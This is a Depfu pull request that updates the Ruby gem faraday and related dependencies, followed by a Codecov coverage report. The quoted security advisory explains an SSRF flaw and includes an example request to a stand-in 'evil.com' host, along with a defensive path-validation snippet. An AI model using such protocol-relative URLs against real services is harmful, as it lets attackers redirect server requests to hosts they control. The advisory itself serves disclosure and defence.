🚨 [security] [ruby] Update faraday 1.10.3 → 1.10.5 (patch)

[depfu]

---

🚨 Your current dependencies have known security vulnerabilities 🚨

This dependency update fixes known security vulnerabilities. Please see the details below and assess their impact carefully. We recommend to merge and deploy this as soon as possible!

---

Here is everything you need to know about this update. Please take a good look at what changed and the test results before merging this pull request.

What changed?

↗️ faraday (indirect, 1.10.3 → 1.10.5) · Repo · Changelog

Security Advisories 🚨

🚨 Faraday affected by SSRF via protocol-relative URL host override in build_exclusive_url

Impact

Faraday's build_exclusive_url method (in lib/faraday/connection.rb) uses Ruby's
URI#merge to combine the connection's base URL with a user-supplied path. Per RFC 3986,
protocol-relative URLs (e.g. //evil.com/path) are treated as network-path references
that override the base URL's host/authority component.

This means that if any application passes user-controlled input to Faraday's get(),
post(), build_url(), or other request methods, an attacker can supply a
protocol-relative URL like //attacker.com/endpoint to redirect the request to an
arbitrary host, enabling Server-Side Request Forgery (SSRF).

The ./ prefix guard added in v2.9.2 (PR #1569) explicitly exempts URLs starting with
/, so protocol-relative URLs bypass it entirely.

Example:

conn = Faraday.new(url: 'https://api.internal.com')
conn.get('//evil.com/steal')
# Request is sent to https://evil.com/steal instead of api.internal.com

Patches

Faraday v2.14.1 is patched against this security issue. All versions of Faraday up to 2.14.0 are affected.

Workarounds

NOTE: Upgrading to Faraday v2.14.1+ is the recommended action to mitigate this issue, however should that not be an option please continue reading.

Applications should validate and sanitize any user-controlled input before passing it to
Faraday request methods. Specifically:

• Reject or strip input that starts with // followed by a non-/ character
• Use an allowlist of permitted path prefixes
• Alternatively, prepend ./ to all user-supplied paths before passing them to Faraday

Example validation:

def safe_path(user_input)
  raise ArgumentError, "Invalid path" if user_input.match?(%r{\A//[^/]})
  user_input
end

Release Notes

1.10.4

What's Changed

• Make sure that Faraday::Request::Json and Faraday::Response::Json are correctly autoloaded by @iMacTia in #1595

Full Changelog: v1.10.3...v1.10.4

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 5 commits:

• Version bump to 1.10.5
• Update rubocop complexity thresholds for security fix
• Backport security fix for CVE-2026-25765 to 1.x branch (#1665)
• Version bump to 1.10.4
• Make sure that `Faraday::Request::Json` and `Faraday::Response::Json` are correctly autoloaded (#1595)

↗️ faraday-em_synchrony (indirect, 1.0.0 → 1.0.1) · Repo · Changelog

Release Notes

1.0.1

What's Changed

• CI: Prepare Trusted Publisher in RubyGems by @iox in #4

New Contributors

• @iox made their first contribution in #4

Full Changelog: v1.0.0...v1.0.1

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 6 commits:

• v1.0.1
• Merge pull request #4 from iox/patch-1
• CI: Use latest Ruby and bundled gems in Publish
• CI: Prepare to use latest Ruby in publish workflow
• Prepare trusted publisher
• Move documentation from Faraday website to README

↗️ faraday-multipart (indirect, 1.0.4 → 1.2.0) · Repo · Changelog

Release Notes

1.2.0

What's Changed

• Relax required_ruby_version to support Ruby 4.0 by @taketo1113 in #21

New Contributors

• @taketo1113 made their first contribution in #21

Full Changelog: v1.1.1...v1.2.0

1.1.1

What's Changed

• Prepare Trusted Publisher by @djsmentya in #16
• CI: Rename Workflows to .yml suffix by @olleolleolle in #17

New Contributors

• @djsmentya made their first contribution in #16

Full Changelog: v1.1.0...v1.1.1

1.1.0

What's Changed

• README.md: Use GitHub Actions badge by @olleolleolle in #13
• Add The Ability To Specify A Different Content Type by @juna-nb in #14

New Contributors

• @juna-nb made their first contribution in #14

Full Changelog: v1.0.4...v1.1.0

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 13 commits:

• Version bump to 1.2.0
• Relax `required_ruby_version` to support Ruby 4.0 (#21)
• CI: Rename Workflows to .yml suffix (#17)
• v1.1.1
• Prepare Trusted Publisher (#16)
• CI: Allow RuboCop to run on Ruby 2.7
• Unignore .ruby-version file
• Use ruby/setup-ruby action in publish
• Version bump to 1.1.0
• Add The Ability To Specify A Different MIME Type (#14)
• README.md: Use GitHub Actions badge (#13)
• gemspec: depend on multipart-post ~> 2.0
• CHANGELOG: correct URLs

↗️ faraday-net_http (indirect, 1.0.1 → 1.0.2) · Repo · Changelog

Release Notes

1.0.2

What's Changed

• net_http adapter: Backport #38 "net_http adapter: Fix to avoid calling configure_ssl for HTTP connections" to version 1.x by @ma2gedev in #39

Full Changelog: v1.0.1...v1.0.2

Does any of this look wrong? Please let us know.

Commits

See the full diff on Github. The new version differs by 2 commits:

• v1.0.2
• Fix conditions for calling `configure_ssl`

↗️ multipart-post (indirect, 2.4.0 → 2.4.1) · Repo · Changelog

Commits

See the full diff on Github. The new version differs by 2 commits:

• Bump patch version.
• Modernize gem.

---

Depfu will automatically keep this PR conflict-free, as long as you don't add any commits to this branch yourself. You can also trigger a rebase manually by commenting with @depfu rebase.

All Depfu comment commands

@​depfu rebase

Rebases against your default branch and redoes this update

@​depfu recreate

Recreates this PR, overwriting any edits that you've made to it

@​depfu merge

Merges this PR once your tests are passing and conflicts are resolved

@​depfu cancel merge

Cancels automatic merging of this PR

@​depfu close

Closes this PR and deletes the branch

@​depfu reopen

Restores the branch and reopens this PR (if it's closed)

@​depfu pause

Ignores all future updates for this dependency and closes this PR

@​depfu pause [minor|major]

Ignores all future minor/major updates for this dependency and closes this PR

@​depfu resume

Future versions of this dependency will create PRs again (leaves this PR as is)

[codecov]

Codecov Report

✅ All modified and coverable lines are covered by tests.
✅ Project coverage is 84.59%. Comparing base (1b9b14c) to head (fbf2021).

Additional details and impacted files

@@           Coverage Diff            @@
##           develop    #2705   +/-   ##
========================================
  Coverage    84.59%   84.59%           
========================================
  Files          501      501           
  Lines        20538    20538           
  Branches       377      377           
========================================
  Hits         17374    17374           
  Misses        3161     3161           
  Partials         3        3           

Flag	Coverage Δ
javascript	79.71% <ø> (ø)
pull_request	84.59% <ø> (ø)
push	84.59% <ø> (ø)
ruby	92.56% <ø> (ø)

Flags with carried forward coverage won't be shown. Click here to find out more.

☔ View full report in Codecov by Sentry.
📢 Have feedback on the report? Share it here.

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.